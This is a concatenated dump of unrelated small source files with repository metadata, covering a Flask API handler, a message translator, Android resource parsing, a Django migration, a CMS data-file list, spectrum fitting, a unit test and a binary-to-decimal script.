    anonymous and content.

    Returns a 400 payload when a required field is missing instead of
    crashing with an unhandled KeyError (HTTP 500).
    """
    payload = request.json or {}
    try:
        user_id = payload['user_id']
        question_id = payload['question_id']
        anonymous = payload['anonymous']
        content = payload['content']
    except KeyError as e:
        return jsonify({
            'status': 400,
            'code': 1,
            'msg': 'missing field: %s' % e.args[0]
        })
    answer = Answer.save(content, anonymous, user_id, question_id)
    return jsonify({
        'status': 201,
        'code': 0,
        'msg': 'answer created',
        'answer': {
            'id': answer.id,
            'content': answer.content,
            'anonymous': answer.anonymous
        }
    })
| [
"kaiwkx@gmail.com"
] | kaiwkx@gmail.com |
88cd07b5a55a1d8ac1a11d50651d3052496b91a9 | f585bfd9b7b8b64aad59fd4ec8850bb03c4517e8 | /Translator/handlers/request_handlers.py | 0333cc82bca94834140cd5eeea2f8b016656e156 | [] | no_license | StefanEvanghelides/eai2019 | 62a7d57fc079893e71a74a7a763d19302f733e01 | 25ef13cd52cba35e335e64f40d80f461d1f5faf4 | refs/heads/master | 2020-09-10T18:44:51.608371 | 2020-08-02T09:32:45 | 2020-08-02T09:32:45 | 221,801,906 | 0 | 0 | null | 2020-08-02T09:32:46 | 2019-11-14T23:02:00 | Python | UTF-8 | Python | false | false | 396 | py | import json
def handle_product_translation(translators, message, headers, queues):
    """Translate a product message into its target locale and forward the
    result on the message bus.

    `message` is a JSON string whose "locale" key selects the translator.
    """
    payload = json.loads(message)
    target_locale = payload["locale"]
    translated = translators[target_locale].translate(payload)
    print("translated message to %s" % target_locale)
    bus = queues["message-bus"]
    bus.send(
        body=json.dumps(translated),
        headers=headers,
        destination="message-bus-in",
    )
| [
"r.m.van.buijtenen@student.rug.nl"
] | r.m.van.buijtenen@student.rug.nl |
c4a24a1f172e7a208fc8fb301452a2d6d42c5fb5 | 8df93619349f2261cc8b542b584d1ca3ecbe3c70 | /Dependency/_utils.py | 24cca3f185d99e4a19e841db4310ee04f481e85f | [] | no_license | AlisonYS/Python | 0e5dc4b95ab5572414957bc3bf46aa03a6c6266f | b846040ba4b32f85c6842d962f50167e353cb6c0 | refs/heads/master | 2021-01-25T07:00:50.561080 | 2018-06-25T13:49:41 | 2018-06-25T13:49:41 | 93,635,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | from os import walk
import re
def getFileListWithJava(path):
for (dirpath, dirnames, filenames) in walk(path):
for name in filenames:
if name.endswith(".java") and (name is not "R.java"):
myfile = open(dirpath +"/"+ name)
content = myfile.readlines()
for line in content:
if line.startswith('package '):
_str = line[line.find('package ') + len('package '):-2]
package_name = '"' + _str + '.' + name[0:-5] +'"'
lines = len(content)
print name,lines,package_name
yield name,lines,package_name
# "@com.alipay.mobile.ui:drawable/announcement_close_normal"
# "com.alipay.mobile.ui.R.drawable.qr_default"
def getPubliceResource(filepath):
    """Parse an Android-style public.xml file and, for every declared
    resource whose type is not 'attr', yield a tuple of
    (resource name, quoted xml reference, quoted java reference), e.g. for
    type 'drawable' and name 'qr_default':

      xml  -> '"@com.alipay.mobile.ui:drawable/qr_default"'
      java -> '"com.alipay.mobile.ui.R.drawable.qr_default"'
    """
    xml_name = '@com.alipay.mobile.ui:%s/%s'
    java_name = 'com.alipay.mobile.ui.R.%s.%s'
    # 'with' guarantees the handle is closed; the original never closed it.
    with open(filepath) as myfile:
        content = myfile.readlines()
    for line in content:
        typeArray = re.findall('type="(.*?)"', line)
        nameArray = re.findall('name="(.*?)"', line)
        if len(typeArray) != 0:
            r_type = typeArray[0]
            r_name = nameArray[0]
            if r_type != 'attr':
                xml = '"' + xml_name % (r_type, r_name) + '"'
                java = '"' + java_name % (r_type, r_name) + '"'
                yield r_name, xml, java
if __name__ == '__main__':
    # Ad-hoc smoke run (Python 2 print statement): dump the public resources
    # parsed from a sample public.xml on the author's machine.
    for resourc, xml,java, in getPubliceResource("/Users/xuanmu/work/mpaas-ui/ui/widget/res/values/public.xml"):
        print resourc, xml, java
"xuanmu.ys@alipay.com"
] | xuanmu.ys@alipay.com |
3a0aa4f6f46d50f9055d2000d1b39488f5c19f87 | b341a8d120737297aa8fd394a23633dac9b5ccda | /accounts/migrations/0007_auto_20210122_1129.py | c7476e71ff6f0746f30db617c468bd59bbe23d1c | [] | no_license | Minari766/disney_side_stories | 16d97cb02bf00aa5439d59f753abb9a4706a30aa | aa2d88b1b0fdd87a27f41318bd3ec7352229b6ff | refs/heads/main | 2023-08-15T07:03:16.922579 | 2021-10-03T07:47:22 | 2021-10-03T07:47:22 | 306,496,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # Generated by Django 2.2 on 2021-01-22 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: makes CustomUser.icon an optional
    # ImageField uploaded under "images/".  Do not edit by hand.

    dependencies = [
        ('accounts', '0006_auto_20210122_0127'),
    ]

    operations = [
        migrations.AlterField(
            model_name='customuser',
            name='icon',
            field=models.ImageField(blank=True, null=True, upload_to='images', verbose_name='アイコン'),
        ),
    ]
| [
"mina3.ryu0728@gmail.com"
] | mina3.ryu0728@gmail.com |
941accb672f76b0db53c6f3a669fcfd3f017badb | 227438026ddb81cb13d174fab2f0c492da6c5975 | /python/MuonGunPt50_FullEta_FullPhi_SmallSigmaZ_cfi.py | a59e85f89d64eceb435409fc4a3a149a836cac4e | [] | no_license | skaplanhex/cms-PLTSimulation | 4c360a56335c673e8c703ea70371e58a1aeff60c | 250e324eb3ea83c965dcb0bab47a53b399cf7625 | refs/heads/master | 2021-01-01T15:17:15.047788 | 2014-10-22T00:11:07 | 2014-10-22T00:11:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,016 | py | import FWCore.ParameterSet.Config as cms
source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_100_1_NnM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_10_1_fLF.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_11_1_aaa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_12_1_4PY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_13_1_Tuz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_14_1_6RT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_15_1_9k4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_16_1_wr8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_17_1_rU2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_18_1_nSq.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_19_1_Gjz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_1_1_lOE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_20_1_Mfl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_21_1_tfb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_22_1_wlo.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_23_1_c2x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_24_1_oLd.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_25_1_qSB.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_26_1_vVz.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_27_1_iD8.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_28_1_Tpx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_29_1_Fhe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_2_1_nj1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_30_1_VMa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_31_1_fve.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_32_1_wwI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_33_1_xSu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_34_1_aSb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_35_1_LTi.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_36_1_hPX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_37_1_gLE.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_38_1_6dM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_39_1_890.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_3_1_Dwx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_40_1_6gM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_41_1_cRm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_42_1_l0n.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_43_1_9zp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_44_1_CEr.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_45_1_SG4.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_46_1_jM1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_47_1_G1x.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_48_1_rHg.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_49_1_9Ex.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_4_1_nbS.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_50_1_rhf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_51_1_pVw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_52_1_CNa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_53_1_2FH.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_54_1_lzt.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_55_1_aJy.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_56_1_tKI.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_57_1_WQ1.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_58_1_Kyp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_59_1_eUR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_5_1_SQM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_60_1_BDu.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_61_1_xhw.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_62_1_22q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_63_1_QTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_64_1_djT.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_65_1_krx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_66_1_RVf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_67_1_bNe.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_68_1_HOD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_69_1_rRx.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_6_1_trm.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_70_1_k2l.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_71_1_DFG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_72_1_5LM.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_73_1_QdN.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_74_1_Fwv.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_75_1_8Xf.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_76_1_fiA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_77_1_1Wb.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_78_1_oGC.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_79_1_BAa.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_7_1_WWX.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_80_1_0gY.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_81_1_gIc.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_82_1_akZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_83_1_TZD.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_84_1_D3p.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_85_1_AM5.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_86_1_TnA.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_87_1_lvl.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_88_1_Tv0.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_89_1_G0q.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_8_1_IJR.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_90_1_NTZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_91_1_7CQ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_92_1_bPW.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_93_1_pg2.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_94_1_b1K.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_95_1_qJs.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_96_1_BkG.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_97_1_tGZ.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_98_1_Kof.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_99_1_eMp.root',
'/store/user/skaplan/noreplica/MuonGunPt50/FullEta_FullPhi_SmallSigmaZ/MuonGunEvents_9_1_fKI.root',
)
)
| [
"skaplan@physics.rutgers.edu"
] | skaplan@physics.rutgers.edu |
c2db7ee03c0e494e5769a87dc71cf5ff86c7c6db | 53898c500373b0cb338dd2d1e5e7b2e4fa90e64e | /MigrateDaoExamole/Class/model/Client.py | d0f80be8f3048bf683916d5e8304d8de3bc4a448 | [] | no_license | CGVLobo/Python | 6026f99a8c58a80e0cc890478016ac1e4aeb1ba5 | 6dd57016dcb9ab62836a2aebb4e3201238a194fb | refs/heads/master | 2021-08-28T10:31:48.390904 | 2021-08-23T23:54:13 | 2021-08-23T23:54:13 | 238,586,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py | class Client:
    def __init__(self,name,age):
        # name: client display name (str); age: client age
        self.name=name
        self.age=age
    def setId(self,id):
        # Attach an identifier after construction; toString() requires this
        # to have been called, otherwise it raises AttributeError.
        self.id=id
def toDict(self):
return self.__dict__
def toString(self):
return "name="+self.name+" age="+str(self.age)+" id="+str(self.id) | [
"noreply@github.com"
] | noreply@github.com |
2d430f2574987f6486384f1b770dec90e0908c69 | 5486c1f077634cf7ecbc69a05c2ac78d3ef86770 | /parte1.py | 9288241ecaf20dd129f268085ed4dc812dcbdd0e | [
"MIT"
] | permissive | LeonardoLeiva/10Tarea | 93d76bf3e4a573bec58ada49ef60bfb0e29baa60 | 624f9d7cf2d2252482c7f3e8ef27dea7e52b0bd9 | refs/heads/master | 2020-12-28T19:46:13.856262 | 2015-12-02T03:34:26 | 2015-12-02T03:34:26 | 47,144,826 | 0 | 0 | null | 2015-11-30T20:43:25 | 2015-11-30T20:43:24 | null | UTF-8 | Python | false | false | 2,530 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
este codigo busca modelar un espectro experimental
'''
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
from scipy.optimize import leastsq
from scipy import optimize as opt
# funciones estructurales
def leer_archivo(nombre):
    '''
    Load whitespace-separated numeric data from the file `nombre` (str)
    and return it as a NumPy array.
    '''
    return np.loadtxt(nombre)
def modelo_gauss(p, x):
    """Linear continuum minus a Gaussian absorption line.

    p = (a, b, A, mu, sigma): continuum slope/intercept and the amplitude,
    center and width of the Gaussian.  Returns a*x + b - A*N(mu, sigma).pdf(x).
    """
    a, b, A, mu, sigma = p
    continuo = a * x + b
    # original had a stray chained assignment "y2 = y = ..."; dropped here
    linea = A * scipy.stats.norm(loc=mu, scale=sigma).pdf(x)
    return continuo - linea
def modelo_lorentz(p, x):
    """Linear continuum minus a Lorentzian (Cauchy) absorption line.

    p = (a, b, A, mu, sigma): continuum slope/intercept and the amplitude,
    center and scale of the Lorentzian profile.
    """
    a, b, A, mu, sigma = p
    recta = a * x + b
    perfil = A * scipy.stats.cauchy(loc=mu, scale=sigma).pdf(x)
    return recta - perfil
def plot(x, y, y1, y2):
    '''
    Plot each model fit against the experimental spectrum (separately):
    the Gaussian fit is saved to gauss.png and the Lorentzian fit to
    lorentz.png, then both are shown interactively.
    '''
    fig = plt.figure()
    fig.clf()
    ax1 = fig.add_subplot(111)
    ax1.plot(x, y, '+', label="Espectro Experimental")
    ax1.plot(x, y1, '-', label="Ajuste Gaussiano")
    ax1.plot()
    ax1.set_xlabel("Longitud de Onda [$\AA$]")
    ax1.set_ylabel("Frecuencia [$erg s^{-1} Hz^{-1} cm^{-2}$]")
    plt.legend(loc=4)
    plt.savefig("gauss.png")
    # reuse the same figure for the Lorentzian comparison
    fig.clf()
    ax2 = fig.add_subplot(111)
    ax2.plot(x, y, '+', label="Espectro Experimental")
    ax2.plot(x, y2, '-', label="Ajuste Lorentz")
    ax2.plot()
    ax2.set_xlabel("Longitud de Onda [$\AA$]")
    ax2.set_ylabel("Frecuencia [$erg s^{-1} Hz^{-1} cm^{-2}$]")
    plt.legend(loc=4)
    plt.savefig("lorentz.png")
    plt.draw()
    plt.show()
def experimental():
    '''
    Convenience wrapper: load the experimental spectrum from
    "espectro.dat" and return (wavelengths, fluxes) as two columns.
    '''
    ex = leer_archivo("espectro.dat")
    x_ex = ex[:, 0]
    y_ex = ex[:, 1]
    return x_ex, y_ex
def residuo_gauss(p, x_exp, y_exp):
    """Residuals of the Gaussian model against the data (for leastsq)."""
    return y_exp - modelo_gauss(p, x_exp)
def residuo_lorentz(p, x_exp, y_exp):
    """Residuals of the Lorentzian model against the data (for leastsq)."""
    return y_exp - modelo_lorentz(p, x_exp)
def chi_cuadrado(p, x, y, f):
    """Sum of squared residuals between data y and model f(p, x)."""
    residuos = y - f(p, x)
    return np.sum(residuos ** 2)
# initialization: initial guess (slope, intercept, amplitude, center, width)
p0 = 1e-16, 0, 1e-16, 6550, 1
x_exp, y_exp = experimental()
aprox_1 = leastsq(residuo_gauss, p0, args=(x_exp, y_exp))
aprox_2 = leastsq(residuo_lorentz, p0, args=(x_exp, y_exp))
# plot the two fitted models against the data (Python 2 print statements)
p_gauss = aprox_1[0]
p_lorentz = aprox_2[0]
y1 = modelo_gauss(p_gauss, x_exp)
y2 = modelo_lorentz(p_lorentz, x_exp)
plot(x_exp, y_exp, y1, y2)
print p_gauss
print p_lorentz
print chi_cuadrado(p_gauss, x_exp, y_exp, modelo_gauss)
# NOTE(review): the line below evaluates the Lorentz parameters with
# modelo_gauss — probably intended to be modelo_lorentz; confirm.
print chi_cuadrado(p_lorentz, x_exp, y_exp, modelo_gauss)
| [
"leonardo_conan@hotmail.com"
] | leonardo_conan@hotmail.com |
436645c364f840999119d1e57184125dbceeca14 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml_wordNumbering_test.py | 9d73299a89601ac0dd3e3d023fcdc93ea3e7a208 | [] | no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,070 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from unittest import TestCase
import sys
from oxml_wordNumbering import WordNumbering
# Fixture: a word/numbering.xml part extracted from an OOXML document.
testFile = "testData/numbering.xml"
class WordNumberingTest(TestCase):
    # Exercises WordNumbering against the numbering.xml fixture.
    def setUp(self):
        # Load the raw XML once per test.
        f = open(testFile, "rb")
        self.wordNumberingXmlStr = f.read()
        f.close()
    def tearDown(self):
        pass
    def testGetNumLevelInfo(self):
        #word/numbering.xml
        # numId/level select one abstract numbering definition level.
        wordNum = WordNumbering(self.wordNumberingXmlStr)
        numId = "1"
        level = "0"
        info = wordNum.getNumLevelInfo(numId, level)
        expected = {'leftIndent': u'720', 'start': u'1', 'jc': u'left',
                    'text': u'%1.', 'format': u'decimal'}
        self.assertEquals(info, expected)
def runUnitTests(locals):
    # Run unittest.main(), optionally restricted to test names given on the
    # command line (with or without the "test" prefix).  Non-selected test
    # methods are deleted from the TestCase classes found in `locals`.
    # Python 2 print-statement syntax throughout.
    print "\n\n\n\n"
    if sys.platform=="cli":
        # IronPython: clear the console via .NET before printing the banner
        import clr
        import System.Console
        System.Console.Clear()
        print "---- Testing under IronPython ----"
    else:
        print "---- Testing ----"
    # Run only the selected tests
    args = list(sys.argv)
    sys.argv = sys.argv[:1]
    args.pop(0)
    runTests = args
    runTests = [ i.lower().strip(", ") for i in runTests]
    runTests = ["test"+i for i in runTests if not i.startswith("test")] + \
               [i for i in runTests if i.startswith("test")]
    if runTests!=[]:
        # every TestCase subclass visible in the caller's namespace
        testClasses = [i for i in locals.values() \
                        if hasattr(i, "__bases__") and \
                        (TestCase in i.__bases__)]
        testing = []
        for x in testClasses:
            l = dir(x)
            l = [ i for i in l if i.startswith("test") and callable(getattr(x, i))]
            for i in l:
                if i.lower() not in runTests:
                    # drop unselected tests so unittest.main() skips them
                    delattr(x, i)
                else:
                    testing.append(i)
        x = None
        num = len(testing)
        if num<1:
            print "No selected tests found! - %s" % str(args)[1:-1]
        elif num==1:
            print "Running selected test - %s" % (str(testing)[1:-1])
        else:
            print "Running %s selected tests - %s" % (num, str(testing)[1:-1])
    from unittest import main
    main()
if __name__=="__main__":
    # Usage: python oxml_wordNumbering_test.py [testName ...]
    runUnitTests(locals())
    sys.exit(0)
| [
"raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05"
] | raward@gmail.com@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
4cead54d458cb2804b14a4b098d1ed1d48940e63 | f6fd53b95498b7a3c33c9726982db1c52f7f208f | /binary_to_decimal.py | e7bc657cd2b46270d061344f03ab2ea3b970dfb3 | [] | no_license | AEC-Tech/Python-Programming | aed84cc40e6c5a9b4035d251c47585d6d8a5dbfb | fb2dcd766b1e2cca6c712fdbdff72f5d50ee93b1 | refs/heads/master | 2022-08-11T13:17:03.618471 | 2022-07-25T12:26:30 | 2022-07-25T12:26:30 | 127,695,508 | 23 | 22 | null | 2020-10-04T18:14:02 | 2018-04-02T03:01:56 | Jupyter Notebook | UTF-8 | Python | false | false | 145 | py | binary = input("Enter the binay number : ")
# Manual binary-to-decimal conversion of the digit string read into
# `binary` above: s accumulates digit * 2**position, most-significant first.
s = 0
n = len(binary) - 1
for d in binary:
    s += int(d) * 2 ** n
    n -= 1
print("Decimal is ",s)
"noreply@github.com"
] | noreply@github.com |
3ec22fdc103cb902979ce4613a9130c89dd06f66 | 256f5e959d2afa3416cbc97609dbf4e3ed2d08a0 | /visual_helper.py | 34a61643b41f07fd8d183fdaec4b583b0c01e3e0 | [] | no_license | ferhatmelih/gittutorial | 692280aaf8365bd97d777b5e3428a7fb1b1346c3 | 7e9a06d845b3e5d8c67cbba958d6bdc329e224d1 | refs/heads/master | 2020-08-06T13:20:06.851039 | 2019-10-05T13:38:03 | 2019-10-05T13:38:03 | 212,990,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | asdas
def function():
pass | [
"melih.dal@eatron.com"
] | melih.dal@eatron.com |
